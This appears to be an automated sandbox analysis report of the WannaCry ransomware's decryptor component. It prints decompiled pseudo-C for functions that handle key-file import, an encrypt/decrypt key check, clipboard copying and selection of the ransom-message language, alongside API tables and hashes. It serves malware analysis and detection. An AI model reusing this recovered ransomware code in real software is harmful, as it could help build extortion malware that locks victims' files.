										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}








































                                                      0x0040b3c0
                                                      0x0040b3c4
                                                      0x0040b3ce
                                                      0x0040b3d9
                                                      0x0040b3e3
                                                      0x0040b3e8
                                                      0x0040b3e9
                                                      0x0040b3e9
                                                      0x0040b3ee
                                                      0x0040b3f2
                                                      0x0040b3f6
                                                      0x0040b602
                                                      0x0040b60b
                                                      0x0040b615
                                                      0x0040b61a
                                                      0x0040b61b
                                                      0x0040b624
                                                      0x0040b628
                                                      0x0040b62e
                                                      0x0040b632
                                                      0x0040b634
                                                      0x0040b638
                                                      0x0040b651
                                                      0x0040b660
                                                      0x0040b663
                                                      0x0040b66a
                                                      0x0040b671
                                                      0x0040b678
                                                      0x0040b67e
                                                      0x0040b685
                                                      0x0040b689
                                                      0x0040b689
                                                      0x0040b685
                                                      0x0040b690
                                                      0x0040b3fc
                                                      0x0040b3fc
                                                      0x0040b40a
                                                      0x00000000
                                                      0x0040b410
                                                      0x0040b410
                                                      0x0040b417
                                                      0x0040b4ed
                                                      0x0040b4f0
                                                      0x0040b4f4
                                                      0x0040b5ba
                                                      0x0040b5be
                                                      0x0040b5c0
                                                      0x0040b5c4
                                                      0x0040b5ca
                                                      0x00000000
                                                      0x0040b5d0
                                                      0x0040b5d0
                                                      0x0040b5d0
                                                      0x0040b5d1
                                                      0x0040b5d4
                                                      0x0040b5d9
                                                      0x0040b5e3
                                                      0x0040b5e5
                                                      0x0040b5ea
                                                      0x0040b5f0
                                                      0x0040b5f2
                                                      0x0040b5ff
                                                      0x0040b5ff
                                                      0x0040b4fa
                                                      0x0040b4fe
                                                      0x0040b500
                                                      0x0040b504
                                                      0x0040b508
                                                      0x0040b50e
                                                      0x00000000
                                                      0x0040b510
                                                      0x0040b516
                                                      0x0040b516
                                                      0x0040b51c
                                                      0x0040b520
                                                      0x0040b528
                                                      0x0040b52c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b534
                                                      0x0040b538
                                                      0x0040b53a
                                                      0x0040b541
                                                      0x0040b549
                                                      0x0040b54a
                                                      0x0040b54b
                                                      0x0040b53a
                                                      0x0040b555
                                                      0x0040b559
                                                      0x0040b55f
                                                      0x0040b56f
                                                      0x0040b56f
                                                      0x0040b571
                                                      0x0040b57b
                                                      0x0040b57f
                                                      0x0040b581
                                                      0x0040b589
                                                      0x0040b58a
                                                      0x0040b590
                                                      0x0040b512
                                                      0x00000000
                                                      0x0040b592
                                                      0x0040b599
                                                      0x0040b599
                                                      0x00000000
                                                      0x0040b590
                                                      0x0040b5a5
                                                      0x0040b5ab
                                                      0x0040b5af
                                                      0x0040b5b4
                                                      0x0040b5b5
                                                      0x00000000
                                                      0x0040b5b5
                                                      0x0040b50e
                                                      0x0040b41d
                                                      0x0040b429
                                                      0x0040b42b
                                                      0x0040b42f
                                                      0x0040b435
                                                      0x0040b4c5
                                                      0x0040b4cc
                                                      0x0040b43b
                                                      0x0040b43b
                                                      0x0040b43f
                                                      0x0040b440
                                                      0x0040b443
                                                      0x0040b44b
                                                      0x0040b44f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b457
                                                      0x0040b45b
                                                      0x0040b461
                                                      0x0040b461
                                                      0x0040b467
                                                      0x0040b46e
                                                      0x0040b476
                                                      0x0040b477
                                                      0x0040b478
                                                      0x0040b467
                                                      0x0040b482
                                                      0x0040b488
                                                      0x0040b48e
                                                      0x0040b49e
                                                      0x0040b49e
                                                      0x0040b4a0
                                                      0x0040b4aa
                                                      0x0040b4b0
                                                      0x0040b4b2
                                                      0x0040b4b4
                                                      0x0040b4b5
                                                      0x0040b4b9
                                                      0x0040b4bf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b4bf
                                                      0x0040b4d8
                                                      0x0040b4de
                                                      0x0040b4e2
                                                      0x0040b4e7
                                                      0x0040b4e8
                                                      0x00000000
                                                      0x0040b4e8
                                                      0x0040b435
                                                      0x0040b417
                                                      0x0040b40a
                                                      0x00000000

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                                      • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}










                                                      0x00407c32
                                                      0x00407c38
                                                      0x00407c40
                                                      0x00407cab
                                                      0x00407c42
                                                      0x00407c55
                                                      0x00407c59
                                                      0x00407c66
                                                      0x00407c6c
                                                      0x00407c79
                                                      0x00407c7f
                                                      0x00407c86
                                                      0x00407c89
                                                      0x00407c90
                                                      0x00407c92
                                                      0x00407c9b
                                                      0x00000000
                                                      0x00407ca8
                                                      0x00407c63
                                                      0x00407c63

                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 00407C38
                                                      • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                                      • CloseClipboard.USER32 ref: 00407C5B
                                                      • EmptyClipboard.USER32 ref: 00407C66
                                                      • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                                      • CloseClipboard.USER32 ref: 00407CA1
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                                      • String ID:
                                                      • API String ID: 142981918-0
                                                      • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                                      • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154encryptionstringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 47%
                                                      			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}




























                                                      0x004047c3
                                                      0x004047c5
                                                      0x004047ca
                                                      0x004047d5
                                                      0x004047d6
                                                      0x004047e6
                                                      0x004047e8
                                                      0x004047ee
                                                      0x004047f3
                                                      0x004047f9
                                                      0x004047ff
                                                      0x00404805
                                                      0x0040480b
                                                      0x00404811
                                                      0x00404818
                                                      0x0040482c
                                                      0x0040482c
                                                      0x0040482e
                                                      0x00404830
                                                      0x0040483c
                                                      0x00404841
                                                      0x00404850
                                                      0x004048f3
                                                      0x004048f8
                                                      0x00404905
                                                      0x00404856
                                                      0x00404856
                                                      0x00404869
                                                      0x0040486e
                                                      0x00404873
                                                      0x00404995
                                                      0x00404995
                                                      0x0040499a
                                                      0x00000000
                                                      0x00404879
                                                      0x0040487c
                                                      0x00404885
                                                      0x0040488a
                                                      0x0040488f
                                                      0x00000000
                                                      0x00404895
                                                      0x004048a6
                                                      0x004048a8
                                                      0x004048ae
                                                      0x004048b2
                                                      0x004048bc
                                                      0x004048bc
                                                      0x004048be
                                                      0x004048c9
                                                      0x004048d0
                                                      0x004048d1
                                                      0x004048d3
                                                      0x004048d5
                                                      0x004048da
                                                      0x004048e3
                                                      0x0040491c
                                                      0x00404928
                                                      0x0040493d
                                                      0x0040495c
                                                      0x00404984
                                                      0x0040498b
                                                      0x00000000
                                                      0x0040495e
                                                      0x0040495e
                                                      0x00404963
                                                      0x00404964
                                                      0x00404974
                                                      0x00404981
                                                      0x00404981
                                                      0x0040492a
                                                      0x0040492a
                                                      0x0040492f
                                                      0x00000000
                                                      0x0040492f
                                                      0x004048e5
                                                      0x004048e5
                                                      0x004048ea
                                                      0x004048eb
                                                      0x004048eb
                                                      0x00000000
                                                      0x004048f0
                                                      0x004048e3
                                                      0x0040488f
                                                      0x00404873

                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                        • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                        • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                        • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                      • _local_unwind2.MSVCRT ref: 004048EB
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                                      • strncmp.MSVCRT(00000000,?), ref: 00404951
                                                      • _local_unwind2.MSVCRT ref: 00404964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                                      • String ID: TESTDATA
                                                      • API String ID: 154225373-1607903762
                                                      • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                                      • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}















                                                      0x004049b3
                                                      0x004049b5
                                                      0x004049ba
                                                      0x004049c5
                                                      0x004049c6
                                                      0x004049d3
                                                      0x004049dc
                                                      0x004049df
                                                      0x004049e2
                                                      0x004049fb
                                                      0x004049fd
                                                      0x00404a03
                                                      0x00404ac1
                                                      0x00404ac1
                                                      0x00000000
                                                      0x00404a09
                                                      0x00404a0b
                                                      0x00404a11
                                                      0x00404a13
                                                      0x00404a19
                                                      0x00404a2b
                                                      0x00404a40
                                                      0x00404a42
                                                      0x00404a47
                                                      0x00000000
                                                      0x00404a49
                                                      0x00404a5a
                                                      0x00404a75
                                                      0x00404a7d
                                                      0x00404a7f
                                                      0x00404ac3
                                                      0x00404ac6
                                                      0x00000000
                                                      0x00404a81
                                                      0x00404a84
                                                      0x00404a85
                                                      0x00404a95
                                                      0x00404aa2
                                                      0x00404aa2
                                                      0x00404a5c
                                                      0x00404a5c
                                                      0x00404a61
                                                      0x00000000
                                                      0x00404a61
                                                      0x00404a5a
                                                      0x00404a2d
                                                      0x00404a2d
                                                      0x00404a32
                                                      0x00000000
                                                      0x00404a32
                                                      0x00404a1b
                                                      0x00404a1b
                                                      0x00404a1f
                                                      0x00404ac7
                                                      0x00404ac7
                                                      0x00404ad4
                                                      0x00404ae1
                                                      0x00404ae1
                                                      0x00404a19

                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                      • _local_unwind2.MSVCRT ref: 00404AC7
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateSize_local_unwind2
                                                      • String ID:
                                                      • API String ID: 1039228802-0
                                                      • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                                      • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}











                                                      0x00406c25
                                                      0x00406c33
                                                      0x00406c38
                                                      0x00406c3a
                                                      0x00406c3b
                                                      0x00406c41
                                                      0x00406c5b
                                                      0x00406c65
                                                      0x00406c67
                                                      0x00406c71
                                                      0x00406c75
                                                      0x00406c7f
                                                      0x00406c7f
                                                      0x00406c9f
                                                      0x00406cd4
                                                      0x00406ce3
                                                      0x00406ca1
                                                      0x00406cb1
                                                      0x00406cc0
                                                      0x00406cc0

                                                      APIs
                                                      • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                                      • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                                      • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                                      • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                                        • Part of subcall function 00406AE0: #540.MFC42(?,767B20C0), ref: 00406B03
                                                        • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,767B20C0), ref: 00406B62
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                                        • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767B20C0), ref: 00406BC4
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                                        • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                                      • String ID: English
                                                      • API String ID: 600832625-3812506524
                                                      • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                                      • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
